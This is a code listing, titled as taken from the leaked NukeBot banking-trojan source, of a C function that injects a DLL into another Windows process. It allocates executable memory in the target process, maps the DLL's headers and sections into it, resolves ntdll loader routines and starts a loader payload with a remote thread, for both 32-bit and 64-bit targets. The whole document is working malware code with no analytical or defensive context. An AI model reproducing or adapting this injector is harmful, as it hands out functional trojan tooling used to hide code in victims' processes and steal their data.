InjectDll from NukeBot Leaked Source

1. BOOL InjectDll(BYTE *dllBuffer, HANDLE hProcess, BOOL x64)
2. {
3. #ifndef _WIN64
4.    if(!hProcess)
5.       return FALSE;
6.  
7.    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *) dllBuffer;
8.    IMAGE_NT_HEADERS64 *ntHeaders64;
9.    IMAGE_NT_HEADERS32 *ntHeaders32;
10.    if(x64)
11.       ntHeaders64 = (IMAGE_NT_HEADERS64 *) (dllBuffer + dosHeader->e_lfanew);
12.    else
13.       ntHeaders32 = (IMAGE_NT_HEADERS32 *) (dllBuffer + dosHeader->e_lfanew);
14.  
15.    DWORD64 dllRemoteAddress = NULL;
16.    if(x64)
17.    {
18.       dllRemoteAddress = VirtualAllocEx64(hProcess, NULL, ntHeaders64->OptionalHeader.SizeOfImage,
19.          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
20.    }
21.    else
22.    {
23.       dllRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, ntHeaders32->OptionalHeader.SizeOfImage,
24.          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
25.    }
26.    if(!dllRemoteAddress)
27.       return FALSE;
28.  
29.    DWORD64 payloadRemoteAddress = NULL;
30.    if(x64)
31.    {
32.       payloadRemoteAddress = VirtualAllocEx64(hProcess, NULL, sizeof(InjectData64) + payloadSize64,
33.          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
34.    }
35.    else
36.    {
37.      payloadRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, sizeof(InjectData32) + payloadSize32,
38.        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
39.    }
40.    if(!payloadRemoteAddress)
41.       return FALSE;
42.  
43.    PVOID injectData;
44.    IMAGE_SECTION_HEADER *sectionHeader;
45.    
46.    if(x64)
47.    {
48.       sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders64 + 1);
49.       if(!WriteProcessMemory64(hProcess, dllRemoteAddress, dllBuffer, ntHeaders64->OptionalHeader.SizeOfHeaders, NULL))
50.          return FALSE;
51.  
52.       for(DWORD i = 0; i < ntHeaders64->FileHeader.NumberOfSections; ++i)
53.       {
54.          if(sectionHeader[i].SizeOfRawData == 0)
55.             continue;  
56.          if(!WriteProcessMemory64(hProcess, dllRemoteAddress + sectionHeader[i].VirtualAddress,
57.             dllBuffer + sectionHeader[i].PointerToRawData, sectionHeader[i].SizeOfRawData, NULL))
58.          {
59.             return FALSE;
60.          }
61.       }
62.  
63.       InjectData64 injectData64;
64.       injectData64.base = (DWORD64) dllRemoteAddress;
65.  
66.       injectData64.baseRelocation = (DWORD64) dllRemoteAddress +
67.          ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
68.  
69.       injectData64.importDesc = (DWORD64) dllRemoteAddress +
70.          ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
71.  
72.       DWORD64 hNtdll64 = GetModuleHandle64((wchar_t *) Strs::wNtdll);
73.  
74.       injectData64.aRtlInitAnsiString            = GetProcAddress64(hNtdll64, (char *) Strs::rtlInitAnsiString);
75.       injectData64.aRtlAnsiStringToUnicodeString = GetProcAddress64(hNtdll64, (char *) Strs::rtlAnsiStringToUnicodeString);
76.       injectData64.aLdrLoadDll                   = GetProcAddress64(hNtdll64, (char *) Strs::ldrLoadDll);
77.       injectData64.aLdrGetProcedureAddress       = GetProcAddress64(hNtdll64, (char *) Strs::ldrGetProcedureAddress);
78.       injectData64.aRtlFreeUnicodeString         = GetProcAddress64(hNtdll64, (char *) Strs::rtlFreeUnicodeString);
79.  
80.       injectData = &injectData64;
81.  
82.       if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress, injectData, sizeof(InjectData64), NULL))
83.          return FALSE;
84.  
85.       if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (LPVOID) payload64, payloadSize64, NULL))
86.          return FALSE;
87.  
88.       DWORD64 hThread;
89.  
90.       struct CLIENT_ID { DWORD64 UniqueProcess; DWORD64 UniqueThread; };
91.       CLIENT_ID clientId;
92.  
93.       DWORD64 pRtlCreateUserThread = GetProcAddress64(hNtdll64, (char *) Strs::rtlCreateUserThread);
94.       if(X64Call(pRtlCreateUserThread, 10, (DWORD64) hProcess, (DWORD64) NULL,  (DWORD64) FALSE, (DWORD64) 0,  (DWORD64) 0,  (DWORD64) 0,
95.          (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (DWORD64) payloadRemoteAddress, (DWORD64) &hThread, (DWORD64) &clientId))
96.       {
97.          return FALSE;
98.       }
99.    }
100.    else
101.    {
102.       sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders32 + 1);
103.       if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) dllRemoteAddress, dllBuffer, ntHeaders32->OptionalHeader.SizeOfHeaders, NULL))
104.          return FALSE;
105.          
106.       for(DWORD i = 0; i < ntHeaders32->FileHeader.NumberOfSections; ++i)
107.       {
108.          if(sectionHeader[i].SizeOfRawData == 0)
109.             continue;  
110.          if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) ((BYTE *) dllRemoteAddress + sectionHeader[i].VirtualAddress),
111.             (PVOID) ((BYTE *) dllBuffer + sectionHeader[i].PointerToRawData), sectionHeader[i].SizeOfRawData, NULL))
112.          {
113.             return FALSE;
114.          }
115.       }
116.  
117.       InjectData32 injectData32;
118.       injectData32.base = (DWORD) dllRemoteAddress;
119.  
120.       injectData32.baseRelocation = (DWORD) (IMAGE_BASE_RELOCATION *) ((BYTE *) dllRemoteAddress +
121.          ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
122.  
123.       injectData32.importDesc = (DWORD) (IMAGE_IMPORT_DESCRIPTOR *) ((BYTE *) dllRemoteAddress +
124.          ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
125.  
126.       HMODULE hNtdll = Funcs::pLoadLibraryA(Strs::ntdll);
127.  
128.       injectData32.aRtlInitAnsiString            = (DWORD) GetProcAddress(hNtdll, Strs::rtlInitAnsiString);
129.       injectData32.aRtlAnsiStringToUnicodeString = (DWORD) GetProcAddress(hNtdll, Strs::rtlAnsiStringToUnicodeString);
130.       injectData32.aLdrLoadDll                   = (DWORD) GetProcAddress(hNtdll, Strs::ldrLoadDll);
131.       injectData32.aLdrGetProcedureAddress       = (DWORD) GetProcAddress(hNtdll, Strs::ldrGetProcedureAddress);
132.       injectData32.aRtlFreeUnicodeString         = (DWORD) GetProcAddress(hNtdll, Strs::rtlFreeUnicodeString);
133.  
134.       injectData = &injectData32;
135.  
136.       if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) payloadRemoteAddress, injectData, sizeof(InjectData32), NULL))
137.          return FALSE;
138.  
139.       if(!Funcs::pWriteProcessMemory(hProcess, (BYTE *) payloadRemoteAddress + sizeof(InjectData32), (LPVOID) payload32, payloadSize32, NULL))
140.          return FALSE;
141.  
142.       OSVERSIONINFOEXA osVersion    = { 0 };
143.       osVersion.dwOSVersionInfoSize = sizeof(osVersion);
144.       Funcs::pGetVersionExA((LPOSVERSIONINFOA) &osVersion);
145.       if(osVersion.dwMajorVersion <= 5)
146.       {
147.          if(!Funcs::pCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, 0, NULL))
148.             return FALSE;
149.       }      
150.       else
151.       {
152.          HANDLE    hThread;
153.          CLIENT_ID clientId;
154.          if(Funcs::pRtlCreateUserThread(hProcess, NULL, FALSE, 0, 0, 0, ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, &hThread, &clientId))
155.             return FALSE;  
156.       }
157.    }
158. #endif
159.    return TRUE;
160. }